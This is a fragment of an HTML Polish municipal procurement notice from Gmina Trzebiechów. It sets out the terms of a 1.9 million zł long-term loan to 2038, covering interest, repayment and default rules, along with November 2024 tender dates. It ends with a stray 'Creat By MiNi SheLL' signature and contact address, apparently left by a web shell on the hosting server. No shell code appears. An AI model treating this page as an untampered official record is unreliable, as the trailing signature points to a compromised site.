umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach<br/>określonych poniżej:<br/>1.1. Na warunkach określonych w umowie Bank udzieli Kredytobiorcy kredytu długoterminowego do wysokości – 1 900<br/>000,00 zł (słownie: jeden milion dziewięćset tysięcy złotych) z przeznaczeniem na pokrycie planowanego deficytu budżetu<br/>gminy i spłatę wcześniejszych zobowiązań.<br/>1.2. Kwota kredytu przekazana zostanie (wypłacona) Kredytobiorcy zgodnie z dyspozycją<br/>Zamawiającego.<br/>1.3. Kwota kredytu przekazana zostanie na rachunek bankowy Kredytobiorcy: Gminy Trzebiechów ul. Sulechowska 2 66-<br/>132 Trzebiechów.<br/>1.4. Okres kredytowania – od dnia podpisania umowy do dnia 31 grudnia 2038r.<br/>1.5. Strony ustalają, iż dniem przekazania kwoty kredytu jest dzień uznania rachunku kredytowego<br/>Zamawiającego.<br/>1.6. Zamawiający zastrzega sobie prawo wcześniejszej spłaty kapitału w całości lub w części bez<br/>ponoszenia z tego tytułu żadnych dodatkowych opłat.<br/>1.7. Bank nie pobierze z tytułu uruchomienia kredytu żadnych opłat związanych z uruchomieniem,<br/>zabezpieczeniem oraz obsługą kredytu w całym okresie kredytowania.<br/>1.8. Kwota wykorzystanego kredytu jest oprocentowana według zmiennej stawki WIBOR dla<br/>depozytów trzymiesięcznych obowiązującej na każdy ostatni dzień okresu odsetkowego –<br/>miesiąca kalendarzowego (opublikowanej w internetowym serwisie informacyjnym Reuters o<br/>godz. 11:00 powiększonej o stałą marżę Banku.<br/>1.9. Określone w chwili zawarcia umowy oprocentowanie może ulec zmianom tylko w przypadku<br/>zmiany stawki WIBOR dla depozytów trzymiesięcznych (stopa bazowa). Marża w okresie<br/>umownym jest stała.<br/>1.10. O fakcie wprowadzenia, w okresie obowiązywania umowy o kredyt, nowej stopy bazowej, bank<br/>zawiadomi Kredytobiorcę odrębnym pismem, opatrzonym podpisem elektronicznym, przesłanym<br/>na adres e-mailem: e.kulik@trzebiechow.pl z co najmniej 30 dniowym wyprzedzeniem.<br/>1.11. Należne odsetki naliczane są za każdy dzień korzystania z kredytu licząc od dnia jego<br/>uruchomienia. Naliczanie odsetek dokonuje się w okresach kwartalnych.<br/>1.12. Łączne odsetki od wykorzystanego kredytu są płatne w okresach miesięcznych w terminie:<br/>- płatności rat kapitałowych ,<br/>- ostatnia rata odsetek jest płatna w terminie spłaty ostatniej raty kredytu.<br/>1.13. Za spłatę odsetek przyjmuje się dzień wpływu należności na rachunek kredytowy. Jeżeli termin<br/>płatności przypada na dzień uznany ustawowo za wolny od pracy, wówczas spłata odsetek nastąpi<br/>ostatniego dnia roboczego kwartału kalendarzowego. Spłata kapitału kredytu w złotych polskich<br/>będzie następowała w ratach miesięcznych.<br/>1.14. Kredytobiorca zobowiązuje się do spłaty kredytu i odsetek na rachunek określony w umowie<br/>kredytowej, w kwotach i terminach określonych w harmonogramie spłat.<br/>1.15. Za dzień spłaty kredytu lub jego raty uważa się dzień wpływu kwoty na rachunek Kredytodawcy.<br/>Jeżeli termin płatności przypada na dzień uznany za ustawowo wolnym od pracy, spłata nastąpi<br/>ostatniego dnia roboczego kwartału kalendarzowego.<br/>1.16. Niespłacenie przez Kredytobiorcę kredytu lub jego części w terminach określonych niniejszą<br/>umową, spowoduje przeniesienie niespłaconej w terminie kwoty kredytu na rachunek kredytu<br/>przeterminowanego, oprocentowanego według stawki dla zadłużenia przeterminowanego<br/>obowiązującego w Banku.<br/>1.17. Odsetki za czas opóźnienia pobiera się za każdy dzień zwłoki począwszy od następnego dnia po<br/>upływie terminu płatności, do dnia dokonania wpłaty włącznie tj. uznania rachunku kredytowego<br/>Kredytodawcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/trzebiechow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-12 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-11</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com